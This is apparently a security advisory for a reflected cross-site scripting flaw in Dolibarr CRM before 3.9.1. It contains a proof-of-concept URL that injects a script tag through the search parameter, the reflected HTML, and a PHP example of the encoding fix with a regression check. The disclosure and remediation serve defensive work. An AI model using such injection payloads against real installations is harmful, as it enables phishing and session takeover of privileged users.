Dolibarr CRM Cross Site Scripting

2016.06.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/files/
# Date: Zero Day

Dolibarr ERP is a modern CRM to manage your company. It's open-source software, designed for small and medium companies, foundations and freelancers.

The issue lies in insufficient sanitization of the input a user passes to the search function provided. A user is thus able to inject malicious JS, to be used in hand with a phishing attack directed towards a higher-privileged user.

POC:

http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript>

<form name="formfilter" action="/societe/list.php" method="post">
    <input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>
    <input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>
    <input type="hidden" value="s.nom" name="sortfield"></input>
    <input type="hidden" value="ASC" name="sortorder"></input>
    Search criteria '
    <strong>
        <script>
            alert()      <-------
        </script>
    </strong>
    ' into fields Third party name, Alias name, Custom?
    <table class="liste "></table>
</form>
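The reflection shown in the PoC goes away once the search term is HTML-encoded at the point where it is written into the "Search criteria" banner. The PHP below is an added example, not Dolibarr's code and not part of the original advisory; the function names and the banner-rendering helpers are hypothetical, and the sample inputs are constructed apart from the PoC value.

```php
<?php
// Added example: hypothetical helper names, not Dolibarr source code.

const SUFFIX = " into fields Third party name, Alias name";

// Vulnerable pattern: the search term is concatenated into the HTML as-is,
// so markup sent in "sall" becomes part of the page.
function render_criteria_unsafe(string $sall): string
{
    return "Search criteria '<strong>" . $sall . "</strong>'" . SUFFIX;
}

// Hardened pattern: encode for the HTML context at output time.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE keeps
// invalid UTF-8 from turning the whole string into an empty one.
function render_criteria_safe(string $sall): string
{
    $encoded = htmlspecialchars($sall, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "Search criteria '<strong>" . $encoded . "</strong>'" . SUFFIX;
}

// Regression check: does input containing a tag opener come back verbatim?
function reflects_markup(string $html, string $input): bool
{
    return preg_match('/<[a-z\/!]/i', $input) === 1
        && strpos($html, $input) !== false;
}

// Constructed inputs, except the second, which is the advisory's PoC value.
$samples = [
    "acme",
    "<script>alert()</script>",
    "O'Neil & Sons",
];

foreach ($samples as $sall) {
    foreach (['render_criteria_unsafe', 'render_criteria_safe'] as $fn) {
        $html = $fn($sall);
        printf("%-24s reflected=%-3s %s\n", $fn,
            reflects_markup($html, $sall) ? 'yes' : 'no', $html);
    }
}
```

Only the unsafe renderer reports `reflected=yes` for the PoC value; the legitimate term with an apostrophe and ampersand still displays correctly after encoding.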



Copyright 2024, cxsecurity.com